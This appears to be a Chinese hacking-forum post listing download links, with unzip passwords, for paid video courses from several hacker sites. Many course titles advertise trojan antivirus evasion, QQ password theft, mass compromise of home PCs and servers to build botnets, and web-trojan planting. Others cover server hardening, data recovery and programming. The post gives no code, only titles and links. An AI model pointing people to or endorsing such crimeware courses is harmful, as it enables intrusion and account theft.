http://vipsoft1.hacker.com.cn/vip1-down/geren.rar [第9课]瑞士军刀 http://vipsoft1.hacker.com.cn/vip1-down/ruisijundao.rar [第8课]MT使用详解 http://vipsoft1.hacker.com.cn/vip1-down/MT.rar [第7课]tasklist taskkill shutdown http://vipsoft1.hacker.com.cn/vip1-down/task.rar [第6课]nslookup的命令介绍 http://vipsoft1.hacker.com.cn/vip1-down/nslookup.rar [第5课]net命令使用方法 http://vipsoft1.hacker.com.cn/vip1-down/viptools/net.rar [第4课]在VMware中配置远程SoftICE http://vipsoft1.hacker.com.cn/vip1-down/SoftICE.rar [第3课]构造最适合黑客演练的虚拟机系统 http://vipsoft1.hacker.com.cn/vip1-down/gouzhu.rar [第2课]Vmware下Windows的安装(2) http://vipsoft1.hacker.com.cn/vip1-down/yuyin/vmware2.rar [第1课]Vmware下Windows的安装 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/vmware1.rar [第123课]服务器安全配置与管理系列9-适合web服务器的权限设置 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003quanxian.rar [第122课]服务器安全配置与管理系列8-默认的目录权限 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003mrqx.rar [第121课]服务器安全配置与管理系列7-创建和验证共享文件夹权限 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003gxqx.rar [第120课]服务器安全配置与管理系列6-管理共享权限 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003glgx.rar [第119课]服务器安全配置与管理系列5-克隆帐户 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003klzh.rar [第118课]服务器安全配置与管理系列4-帐户删除工具和方法 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003zhanghu.rar [第117课]服务器安全配置与管理系列3-组的创建和管理 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003zu.rar [第116课]服务器安全配置与管理系列2-本地用户和组 http://vipsoft1.hacker.com.cn/vip1-down/200610/20032zu.rar [第115课]服务器安全配置与管理系列1-Windows Server 2003简介 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003-1.rar [第114课]快速大量获得Webshell并去掉别人的后门 http://vipsoft1.hacker.com.cn/vip1-down/200610/Webshellmen.rar [第113课]网马免杀全过程 http://vipsoft1.hacker.com.cn/vip1-down/200610/wmms.rar [第112课]QQ空间挂马让你肉鸡成群 http://vipsoft1.hacker.com.cn/vip1-down/200610/QQ.rar [第111号]3秒钟免杀盗Q盗件 http://vipsoft1.hacker.com.cn/vip1-down/200610/3q.rar [第110课]对Radmin的详细讲解 http://vipsoft1.hacker.com.cn/vip1-down/200610/Radmin.rar [第109课]初探加密算法之RSA进阶篇 http://vipsoft1.hacker.com.cn/vip1-down/rsa37.rar [第108课]浅谈标志位在爆破中的应用 http://vipsoft1.hacker.com.cn/vip1-down/bzw36.rar [第107课]隐藏在三点式下载者身后的秘密 http://vipsoft1.hacker.com.cn/vip1-down/sdsxzz.rar [第106课]仙剑脱壳动画 http://vipsoft1.hacker.com.cn/vip1-down/xjtkdh.rar [第105课]堀北压缩 0.28 Unpack动画 http://vipsoft1.hacker.com.cn/vip1-down/jbysdh.rar [第104课]对SOHU的再次安全测试 http://vipsoft1.hacker.com.cn/vip1-down/sohu6.rar [第103课]反击盗号者邮箱 http://vipsoft1.hacker.com.cn/vip1-down/fddhzyx.rar [第102课]入侵BBSXP 5.15版本+(ACCESS数据库) http://vipsoft1.hacker.com.cn/vip1-down/rqbbsxp5.rar [第101课]UBB的攻防 http://www.ccert.cn/hacker.com.cn/ubb.rar [第100课]架设PHP+MYSQL环境到搭建Discuz! http://vipsoft1.hacker.com.cn/vip1-down/jxwamp.rar [第99课]新云网站管理系统最新漏洞解析 http://vipsoft1.hacker.com.cn/vip1-down/xywz.rar [第98课]给黑防灰鸽子做免杀 http://vipsoft1.hacker.com.cn/vip1-down/cf.rar [第97课]入侵北大录像 http://vipsoft1.hacker.com.cn/vip1-down/rqbd.rar [第96课]PCShare2006使用教程 http://vipsoft1.hacker.com.cn/vip1-down/pcss.rar [第95课]入侵大学 http://vipsoft1.hacker.com.cn/vip1-down/wwtw.rar [第94课]全面破解心动文件夹 http://vipsoft1.hacker.com.cn/vip1-down/qmpjxd.rar [第93课]反内存注册机一例 ----易经占筮 2005 破解分析 http://vipsoft1.hacker.com.cn/vip1-down/fnc.rar [第92课] 隐藏变量的危害--2s_Blog 突现注入漏洞 http://vipsoft1.hacker.com.cn/vip1-down/2s.rar [第91课]为任意的exe文件插入SplashScreen http://vipsoft1.hacker.com.cn/vip1-down/exesp.rar [第90课]对ASP木马免杀的研究 http://vipsoft1.hacker.com.cn/vip1-down/aspmmyj.rar [第89课]PHP旁注+提权动画(二) http://vipsoft1.hacker.com.cn/vip1-down/phpz2.rar [第88课]PHP旁注+提权动画(一) http://vipsoft1.hacker.com.cn/vip1-down/phpz1.rar [第87课]渗透雷霆888flash系统 http://vipsoft1.hacker.com.cn/vip1-down/leiting.rar [第86课]秒杀流光文章系统 http://vipsoft1.hacker.com.cn/vip1-down/1.rar [第85课]打造绿色版的QQ记牌器 http://vipsoft1.hacker.com.cn/vip1-down/26.rar [第84课]拿下服务器权限到另类留后门(2) http://vipsoft1.hacker.com.cn/vip1-down/yuyin/houmen3.rar [第83课]拿下服务器权限到另类留后门(1) http://vipsoft1.hacker.com.cn/vip1-down/yuyin/houmenyi.rar [第82课]asp.net的serv-u提权 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/tiquan.rar [第81课]孤狐浪子渗透入侵动画六 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/gugu6.rar [第80课]孤狐浪子渗透入侵动画五 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/shen5.rar [第79课]孤狐浪子渗透入侵动画四 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/guguru4.rar [第78课]分离灰鸽子后门捆绑程序 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/fenli.rar [第77课]q-zone鼠标本地用 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/qqzone.rar [第76课]灰鸽子2006服务端免杀 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/hui2006.rar [第75课]孤狐浪子渗透入侵动画二 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/shenru3.rar [第74课]灰鸽子vip2006简单免杀 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/huigeizisha.rar [第73课]孤狐浪子渗透入侵动画二 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/gugu2.rar [第72课]孤狐浪子渗透入侵动画一 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/sehnru.rar [第71课]入侵网站破serv-u密码拿上传空间 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/rukong.rar [第70课]打造自己的ASP木马 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/ASPmm.rar [第69]终极3389刷QB http://vipsoft1.hacker.com.cn/vip1-down/yuyin/3389QB.rar [第67]轻轻松松找注册码 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/qingzhu.rar [第66课]OD破解注册软件 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/ODpojie.rar [第65课]局域网流量控制 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/juyu.rar [第64课]批量入侵家用PC机 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/piripc.rar [第63课]实例入侵国外虚拟主机 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/shiru.rar [第62课]尘缘雅境图文系统上传漏洞 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/chengyuan.rar [第61课]中铁跨站漏洞 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/zhongtie.rar [第60课]菜鸟快速大批拿shell http://vipsoft1.hacker.com.cn/vip1-down/yuyin/nashell.rar [第59课]IIS服务的安全设置 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/iisanquan.rar [第58课]浅谈工程学入侵分析 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/shegong.rar http://soft.yeshack.com/vip/hj/hb1.rar 汇 编 第一课 http://soft.yeshack.com/vip/hj/hb2.rar 汇 编 第二课 http://soft.yeshack.com/vip/hj/hb3.rar 汇 编 第三课 http://soft.yeshack.com/vip/hj/hb4.rar 汇 编 第四课 http://soft.yeshack.com/vip/hj/hb5.rar 汇 编 第五课 http://soft.yeshack.com/vip/hj/hb6.rar 汇 编 第六课 http://soft.yeshack.com/vip/hj/hb7.rar 汇 编 第七课 http://soft.yeshack.com/vip/hj/hb8.rar 汇 编 第八课 http://soft.yeshack.com/vip/hj/hb9.rar 汇 编 第九课 http://soft.yeshack.com/vip/hj/hb10.rar 汇 编 第十课 http://soft.yeshack.com/vip/hj/hb11.rar 汇编第十一课 http://soft.yeshack.com/vip/hj/hb12.rar 汇编第十二课 http://soft.yeshack.com/vip/hj/hb13.rar 汇编第十三课 http://soft.yeshack.com/vip/hj/hb14.rar 汇编第十四课 http://soft.yeshack.com/vip/hj/hb15.rar 汇编第十五课 http://soft.yeshack.com/vip/hj/hb16.rar 汇编第十六课 http://soft.yeshack.com/vip/hj/hb17.rar 汇编第十七课 http://soft.yeshack.com/vip/hj/hb18.rar 汇编第十八课 http://soft.yeshack.com/vip/hj/hb19.rar 汇编第十九课 http://soft.yeshack.com/vip/hj/hb20.rar 汇编第二十课 在当今这样一个信息和网络化的SH里,计算机正在我们的工作和生活中扮演着日益重要的角色。越来越多的企业、商家、政府机关和个人通过计算机来获取信息、处理信息,同时将自己最重要的信息以数据文件的形式保存在计算机中。但是,这些信息并不像我们认为的那么安全,误操作、网络黑客的入侵、计算机病毒的攻击和各种软、硬件故障等天灾人祸都在时刻威胁着数据文件的安全。正因为如此,如何保障计算机数据的安全完整正成为人们日益关注的话题。 针对各种可能的威胁,人们设计了各种防范措施,如防止黑客攻击的网络防火墙、种类繁多的反病毒软件以及各式各样的数据备份软件等。但是所有这些解决方案加起来,也并不能给我们的数据文件提供一个完美的、实时的、万无一失的保护,几乎所有的计算机用户都有过丢失文件的痛苦经历。 每个人一定都有曾不小心误删文件与目录的经验,当您不小心把您的电脑文件删拉。。可想当时您是什么心情。。有没有摔鼠标。。砸键盘。。踢爱机的举动啊。。怎么办呢? 朋友们。 没关系,著名的反黑客安全专家陈十三哥,帮您处理危机。从容面数据危机。只有了解,才能避免更多的数据危机出现。普及信息安全知识, 免费下载.造福广大网民. 未完,待续。 请直接复制全部。或者迅雷下载 http://down.sec120.com/chenshisan/WindowsServer2003-07年3月4月最新补丁.rar http://down.sec120.com/chenshisan/Windows XP-07年3月4月最新补丁.rar http://down.sec120.com/chenshisan/微软恶意软件移除工具07年4月最新版本v1.28.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第1讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第2讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第3讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第4讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第5讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第6讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第7讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第8讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第9讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第10讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第11讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第12讲.rar http://down.sec120.com/chenshisan/陈十三哥作品数据恢复技术第13讲.rar 解压密码:www.juntuan.net http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品web测试技术第一讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品web测试技术第二讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品web测试技术第三讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品web测试技术第四讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品web测试技术第五讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品web测试技术第六讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品web测试技术第七讲.rar http://down.sec120.com/chenshisan/07...?第八讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品信息安全评估讲座第一讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品信息安全评估讲座第二讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品信息安全评估讲座第三讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品信息安全评估讲座第四讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品信息安全评估讲座第五讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品信息安全评估讲座第六讲.rar http://down.sec120.com/chenshisan/07年最新vip课程陈十三哥作品信息安全评估讲座第七讲.rar http://down.sec120.com/chenshisan/07...?第八讲.rar 第一课:打造铜墙铁壁百毒不侵安全系统 下载地址: http://58.216.235.254:8000/第一课:打造铜墙铁壁百毒不侵安全系统.rar 玩转灰鸽子+制作鸽子网马 第二课:国内著名木马软件〈灰鸽子使用〉百分百上线教程 下载地址: http://58.216.235.254:8000/第二课:国内著名木马软件〈灰鸽子使用〉百分百上线教程.rar 第三课:微软最新漏洞MS07_004挂鸽子中鸽子百点百中演示全过程+本站原创网马生成器 下载地址: http://58.216.235.254:8000/第三课微软最新漏洞MS07_004挂鸽子中鸽子百点百中演示全过程+本站原创网马生成器.rar WINDOWS系统各端口入侵教程 第四课:简简单单入侵3389终端-狂抓肉鸡 下载地址: http://58.216.235.254:8000/第四课:简简单单入侵3389终端-狂抓肉鸡.rar 第五课:入侵135.445.139端口所有WINDOWS系统弱口令机器投放灰鸽子木马 下载地址: http://58.216.235.254:8000/第五课:入侵所有WINDOWS系统弱口令机器投放灰鸽子.rar 第六课:实战入侵花都本地WINDOWS系统.开启3389终端建立双用户登陆 下载地址: http://58.216.235.254:8000/第六课:实战入侵花都本地WINDOWS系统.开启3389终端建立双用户登陆.rar 第七课:入侵1433端口轻轻爆破SA弱口令拿下服务器 下载地址: http://58.216.235.254:8000/第七课:入侵1433端口轻轻爆破SA弱口令拿下服务器.rar 第八课:利用2Kserver服务器批量益出MSO6O4O漏洞狂抓肉鸡 下载地址: http://58.216.235.254:8000/第八课:利用2Kserver服务器批量益出MSO6O4O漏洞狂抓肉鸡.rar 脚本入侵教你如何检测漏洞拿网站 第九课: 简简单单入侵企业公司网站 下载地址: http://58.216.235.254:8000/第九课 简简单单入侵企业公司网站.rar 第十课:简简单单网马制作网站主页挂马全过程 下载地址: http://58.216.235.254:8000/第十课简简单单网马制作网站主页挂马全过程. 第一:灰鸽子上线动画[菜鸟级] 第二:灰鸽子免杀动画[超简单] 第三:捆绑、挂马抓肉鸡 第四:系统安装安全设置 第五:简单盗QQ系列 &&&&&&&&&&& 第六:编程语言学习 delphi C语言 E语言 以下内容跟帖回复才能看到 ============================== 黑防鸽子教程(上) http://www.cnnsc.org/File/demo/demo_1575.html 黑防鸽子教程(下) http://www.cnnsc.org/File/demo/demo_1605.html 黑防鸽子教程(完) http://www.cnnsc.org/File/demo/demo_1943.html ============================================= 看完上面3课 基本上线是没问题了。。。如果还没看明白 就再看下面的几课 黑防鸽子随时上线 http://www.cnnsc.org/File/demo/demo_1941.html (语音)鸽子网吧超级简单上线之任意地方上线加免杀 http://www.cnnsc.org/File/demo/demo_1942.html +++++++++++++++++++++++++++++++++++++++++++++++ 加壳动画:两步灰鸽子过卡巴、瑞星、金山、江民 http://www.cnnsc.org/File/demo/demo_2149.html 灰鸽子简单过专杀 http://www.cnnsc.org/File/demo/demo_1712.html ++++++++++++++++++++++++++++++++++++++++++++++++ 木马免杀+网马制作+网马免杀 http://www.cnnsc.org/File/demo/demo_1678.html (语音)捆绑与反捆绑 http://www.cnnsc.org/File/demo/demo_1246.html 黑吃黑破解盗Q邮箱密码 http://www.cnnsc.org/File/demo/demo_1214.html 简简单单找肉鸡 http://www.cnnsc.org/File/demo/demo_1059.html BitComet 做木马种子 http://www.cnnsc.org/File/demo/demo_372.html RM视频音频插马 http://www.cnnsc.org/File/demo/demo_743.html ============================================== 简单的抓肉鸡没有问题了吧`````` 系统安装与安全设置 安全系列(一)之病毒进程派出机外 http://www.cnnsc.org/File/demo/demo_1934.html 安全系列(二)注册表问题 http://www.cnnsc.org/File/demo/demo_1938.html 安全系列(三)不准别人乱动自己的文件 http://www.cnnsc.org/File/demo/demo_1939.html 制作多功能DOS工具光盘镜像-第一章 http://www.cnnsc.org/File/demo/demo_558.html 磁盘分区的操作-第二章 http://www.cnnsc.org/File/demo/demo_651.html 制作多功能系统安装光盘镜像-第三章 http://www.cnnsc.org/File/demo/demo_694.html 彻底关闭139端口 http://www.cnnsc.org/File/demo/demo_582.html 关闭默认共享另一方法 http://www.cnnsc.org/File/demo/demo_570.html ============================================== 简单盗QQ系列 菜鸟简单盗QQ系列动画三 http://www.cnnsc.org/File/demo/demo_3846.html 最简单的盗QQ方法 http://www.cnnsc.org/File/demo/demo_3788.html 菜鸟简单盗QQ系列动画一 http://www.cnnsc.org/File/demo/demo_3787.html =================================================== 编程语言学习 delphi C语言 E语言 从0开始学习delphi VIP 动画教程 从0开始学习delphi(一) http://www.cnnsc.org/File/demo/demo_344.html VIP 动画教程 从0开始学习delphi(二) http://www.cnnsc.org/File/demo/demo_345.html VIP 动画教程 从0开始学习delphi(三) http://www.cnnsc.org/File/demo/demo_355.html VIP 动画教程 从0开始学习delphi(四) http://www.cnnsc.org/File/demo/demo_356.html VIP 动画教程 从0开始学习delphi(五) http://www.cnnsc.org/File/demo/demo_447.html VIP 动画教程 从0开始学习delphi(六) http://www.cnnsc.org/File/demo/demo_559.html C语言:TC的配置 httpwww.cnnsc.orgFiledemodemo_2439.html 语音:C语言教程系列(1) httpwww.cnnsc.orgFiledemodemo_2286.html 语音:C语言教程系列(2) httpwww.cnnsc.orgFiledemodemo_2318.html 语音:C语言教程系列(3) httpwww.cnnsc.orgFiledemodemo_2331.html 语音:C语言教程系列(4) httpwww.cnnsc.orgFiledemodemo_2410.html 语音:C语言教程系列(5) httpwww.cnnsc.orgFiledemodemo_2438.html 语音:C语言教程系列(6) httpwww.cnnsc.orgFiledemodemo_2650.html 语音:C语言教程系列(7) httpwww.cnnsc.orgFiledemodemo_2713.html E语言基础课 配置版权+图标+密码+支持库+破解补丁 http://www.cnnsc.org/File/demo/demo_275.html 易语言4.03专用破解补丁 http://www.cnnsc.org/File/Cnnsc/ruanjian/Cnnsc_274.html 易语言培训教程(2) http://www.cnnsc.org/File/demo/demo_108.html 易语言培训教程(3) http://www.cnnsc.org/File/demo/demo_112.html 易语言培训教程(4) http://www.cnnsc.org/File/demo/demo_113.html 易语言培训教程(5) http://www.cnnsc.org/File/demo/demo_115.html 易语言培训教程(6) http://www.cnnsc.org/File/demo/demo_117.html 易语言培训教程(7) http://www.cnnsc.org/File/demo/demo_190.html 易语言培训教程(8) http://www.cnnsc.org/File/demo/demo_191.html 易语言培训教程(9) http://www.cnnsc.org/File/demo/demo_200.html 易语言培训教程(10) http://www.cnnsc.org/File/demo/demo_206.html 易语言培训教程(11) http://www.cnnsc.org/File/demo/demo_221.html 易语言培训教程(12) http://www.cnnsc.org/File/demo/demo_235.html 易语言培训教程(13) http://www.cnnsc.org/File/demo/demo_248.html 易语言培训教程(15) http://www.cnnsc.org/File/demo/demo_286.html 易语言培训教程(16) http://www.cnnsc.org/File/demo/demo_320.html 易语言培训教程(17) http://www.cnnsc.org/File/demo/demo_358.html 易语言培训教程(18) http://www.cnnsc.org/File/demo/demo_359.html 易语言培训教程(19) http://www.cnnsc.org/File/demo/demo_371.html 易语言培训教程(20) http://www.cnnsc.org/File/demo/demo_384.html 易语言培训教程(21) http://www.cnnsc.org/File/demo/demo_417.html 易语言培训教程(22) http://www.cnnsc.org/File/demo/demo_437.html 易语言培训教程(23) http://www.cnnsc.org/File/demo/demo_448.html 易语言培训教程(24) http://www.cnnsc.org/File/demo/demo_482.html 易语言培训教程(25) http://www.cnnsc.org/File/demo/demo_512.html 旁注之一 http://www.cnnsc.org/File/demo/demo_2464.html 旁注之二 http://www.cnnsc.org/File/demo/demo_2502.html E.S.tor入侵小组第二期培训 以下内容跟帖回复才能看到 ============================== .......: 第1课 如何打造安全的个人电脑 地址:http://vip.cech.com.cn/315664/fb ... 53849b30c295f3.down .......: 第2课各种扫描器的使用 地址:http://vip.cech.com.cn/315964/d8 ... 93db87c185ca64.down .......: 第3课入侵必须掌握的DOS命令 地址:http://vip.cech.com.cn/315684/ce ... 16c0be1a5a0d3b.down .......: 第4课讲解目前流行的各种远控反弹木马的配置上线方法 地址:http://vip.cech.com.cn/315694/ef ... 575f455790056f.down .......: 第6课 详细讲解ESP脱壳定律 地址:http://vip.cech.com.cn/315934/cc ... 011779a1115608.down .......: 第7课 讲解各种木马通用的免杀技术 地址:http://vip.cech.com.cn/315944/14 ... ee422de3c8d507.down .......: 第8课 讲解灰鸽子VIP2006的免杀绝技 地址:http://vip.cech.com.cn/315974/6e ... fbbc1c68d517b4.down .......: 第9课 讲解从一个网页到一个网站的制作方法 地址:http://vip.cech.com.cn/315984/83 ... f141b48c04213b.down .......: 第10课 讲解绝对不会被人检测到被捆绑文件的免杀捆绑绝技 地址:http://vip.cech.com.cn/315634/a0 ... f9e4d0874e7868.down .......: 第11课 全面讲解目前黑客圈里入侵个人电脑及服务器的主流&非主流技术 地址:http://vip.cech.com.cn/315654/4c ... bbc39b0ee78989.down 培训班分期更新部分课程大家注意,链接为直接从军团下载 脚本课学员必看最好的脚本资料 http://soft.juntuan.net/kafei/脚本资料军团.rar 脚本课程学员优秀作业 http://soft.juntuan.net/kafei/学员脚本课程优秀作业kenny.rar 脚本课程学员如何配置SmartIPB论坛 http://soft.juntuan.net/kafei/如何配置%20SmartIPB论坛%20.rar 脚本课程学员必看如何编译exploit http://soft.juntuan.net/kafei/如何编译exploit.rar 祥解提权server-u+工具 http://soft.juntuan.net/kafei/祥解提权server-u+工具.rar 黑客防线VIP基础教程38个 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/vmware1.rar第1课]Vmware下Windows的安装 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/vmware2.rar[第2课]Vmware下Windows的安装(2) http://vipsoft1.hacker.com.cn/vip1-down/gouzhu.rar[第3课]构造最适合黑客演练的虚拟机系统 http://vipsoft1.hacker.com.cn/vip1-down/SoftICE.rar[第4课]在VMware中配置远程SoftICE http://vipsoft1.hacker.com.cn/vip1-down/viptools/net.rar第5课]net命令使用方法 http://vipsoft1.hacker.com.cn/vip1-down/nslookup.rar[第6课]nslookup的命令介绍 http://vipsoft1.hacker.com.cn/vip1-down/task.rar第7课]tasklist taskkill shutdown http://vipsoft1.hacker.com.cn/vip1-down/MT.rar[第8课]MT使用详解 http://vipsoft1.hacker.com.cn/vip1-down/ruisijundao.rar[第9课]瑞士军刀 http://vipsoft1.hacker.com.cn/vip1-down/geren.rar[第10课]个人电脑安全及性能优化 http://vipsoft1.hacker.com.cn/vip1-down/pi1.rar[第11课]批处理教学(1) http://vipsoft1.hacker.com.cn/vip1-down/pi2.rar[第12课]批处理教学(2) http://vipsoft1.hacker.com.cn/vip1-down/for.rar[第13课]for命令解析 http://vipsoft1.hacker.com.cn/vip1-down/bateg.rar[第15课]批处理实例解析 http://vipsoft1.hacker.com.cn/vip1-down/proxy.rar[第16课]代理服务器架设以及术语解释 http://vipsoft1.hacker.com.cn/vi ... 20060113/proxy2.rar[第17课]代理服务器2 http://vipsoft1.hacker.com.cn/vi ... 20060116/clean1.rar第18课]命令行工具来替换被锁定的操作系统文件一 http://vipsoft1.hacker.com.cn/vi ... 20060117/clean2.rar[第19课]通用病毒清除方法-killbox,IceSword,tips:如何反注册dll文件 http://vipsoft1.hacker.com.cn/vi ... 20060118/clean3.rar[第20课]通用病毒清除方法-sc.exe,netsvc.exe的使用 http://vipsoft1.hacker.com.cn/vi ... 0060120/sniffer.rar第21课]嗅探真实的下载地址或者铃声地址。 超级有用黑鹰的VIP下载地址就是这样搞来的 http://vipsoft1.hacker.com.cn/vi ... 0060123/2X-Scan.rar[第22课]X-SCAN使用动画 http://vipsoft1.hacker.com.cn/vi ... 20060206/server.rar[第23课]服务器架设教程 http://vipsoft1.hacker.com.cn/vip-down/donghua/20060207/1snmp.rar[第23课]配置SNMP代理 http://vipsoft1.hacker.com.cn/vip-down/donghua/20060208/WMI-1.rar[第23课]WMI系列教程(一) http://vipsoft1.hacker.com.cn/vip-down/donghua/20060209/WMI-2.rar[第24课]WMI系列教程(二) http://vipsoft1.hacker.com.cn/vip-down/donghua/20060210/WMI-3.rar[第25课]WMI系列教程(三) http://vipsoft1.hacker.com.cn/vi ... 219/Googlehack1.rar[第26课]Google Hack(一) http://vipsoft1.hacker.com.cn/vi ... 220/Googlehack2.rar[第27课]Google Hack(二 http://vipsoft1.hacker.com.cn/vi ... 221/googlehack3.rar[第28课]Google Hack(三) http://vipsoft1.hacker.com.cn/vip1-down/yuyin/logparser.rar第29课]log parser使用动画(一) http://vipsoft1.hacker.com.cn/vip1-down/yuyin/log%20parser.rar[第30课]log parser使用动画(二 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/dongrtai.rar第31课]动态网站建设之数据库的读取 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/virus.rar[第31课]个人电脑维护系列之一:如何使您的电脑在上网冲浪过程中更加安全 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/netcat.rar[第32课]攻防系列之一:netcat教程 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/metasploit.rar[第33课]攻防系列之二:metasploit framework 教程 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/protocol.rar第34课]扫描系列之一:讲解TCP三次握手,ICMP,ARP,UDP等协议以及 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/VPN.rar[第35课]建立VPN连接加速网通与电信的互相访问 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/autoruns.rar[第36课]自启动项目查看分析动画 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/tools-1.rar第37课]几款实用计算机安全软件使用 http://vipsoft1.hacker.com.cn/vip1-down/yuyin/monitor.rar[第38课]磁盘,文件和注册表监视工具的使用 黑客基地PHP教程 http://j.thec.cn/wenping051/黑基vip(PHP)/php1.rar(第一课PHP的安装和测试及学习计划) http://j.thec.cn/wenping051/黑基vip(PHP)/php2.rar(第二课PHP的语法和函数) http://j.thec.cn/wenping051/黑基vip(PHP)/php3.rar(第三课MySQL数据库课程) http://j.thec.cn/wenping051/黑基vip(PHP)/php4.rar(第四课MySQL数据库的命令行管理) http://j.thec.cn/wenping051/黑基vip(PHP)/php5.rar(第五课MySQL语言结构-1.字符串和数字) http://j.thec.cn/wenping051/黑基vip(PHP)/php6.rar(第六课MySQL语言结构-2.数据标识) http://j.thec.cn/wenping051/黑基vip(PHP)/php7.rar (第七课 MYSQL语言结构:3系统变量和用户变量) http://j.thec.cn/wenping051/黑基vip(PHP)/php8.rar (第八课:MYSQL语言结构:4保留字和关键字) http://j.thec.cn/wenping051/黑基vip(PHP)/php9.rar (第九课:用PHP实现文件上传 1.功能实现) http://j.thec.cn/wenping051/黑基vip(PHP)/php10.rar( PHP开发新闻系统1.设计思路) 各大黑客网站黑客VIP教程 http://www.pcshare8.com/exepasskav.rar http://www.pcshare8.com/syspassrav.rar VIP内部免杀教程 解压缩密码pcsharevip psvip.rar压缩包 解压缩密码psvip 黑客教学全集(动画教学) V1.0 http://http1.cnxhacker.net/XGAuth/精品教程/黑客动画/HackerBookV1.0.rar 黑鹰免杀1-15 http://weiweiiiii.gbaopan.com/ 手动脱壳入门1-18 黑赢VIP VB教程1-8 http://kanunu.gbaopan.com/ 黑鹰基地vip-asp教程1-30 http://kanunuasp.gbaopan.com/ 完完全全学入侵(真正学会找肉机)1-4 http://windz.gbaopan.com/ 华夏的软件破解班1-13 黑客基地破解班 http://weiweii.gbaopan.com/ http://*.gbaopan.com/ 华夏vip脚本动画1-18 http://ding555.gbaopan.com/ 动画吧免杀班1.2.3.4.5.7.10.12 http://goodball32.gbaopan.com/ 黑鹰电子书期刊 http://aday.3800cc.com/journal/one.exe http://aday.3800cc.com/journal/two.exe http://aday.3800cc.com/journal/three.exe http://aday.3800cc.com/journal/four.exe http://aday.3800cc.com/journal/five.exe http://aday.3800cc.com/journal/six.exe http://aday.3800cc.com/journal/seven.exe http://aday.3800cc.com/journal/eight.exe http://aday.3800cc.com/journal/nine.exe http://aday.3800cc.com/journal/ten.exe 黑客动画搜索器 可以使用关键词搜索国内知名黑客站点的动画教程! http://fs32.139.com/0/312/huniao/share/2005116165233364.rar 杀系列教程1-6 http://down.stuhack.com/免杀教程第一课.rar http://down.stuhack.com/免杀教程第二课.rar http://down.stuhack.com/免杀教程第三课.rar http://down.stuhack.com/免杀教程第四课.rar http://down.stuhack.com/免杀教程第五课.rar http://down.stuhack.com/免杀教程第六课.rar 华夏黑客联盟免杀班VIP动画 http://safe.whibi.com/down/*ms1.rar http://safe.whibi.com/down/*ms2.rar http://safe.whibi.com/down/*ms3.rar 老在网络走哪有不粘黑..第八军团的一些学习资料,以前这些是资料是VIP会员才能下载的,现在军团办活动,这些资料提供免费下载了.我测试下下都可以下到是.... http://down.sec120.com/chenshisan/[2007春节安全软件大放送006]rootkit检测工具.rar http://down.sec120.com/chenshisan/[2007春节安全软件大放送024]internet自学通(第二版).rar http://down.sec120.com/chenshisan/[军团VIP光盘BB004]第八军团入门系列课程1计算机网络反黑客技术精讲.rar 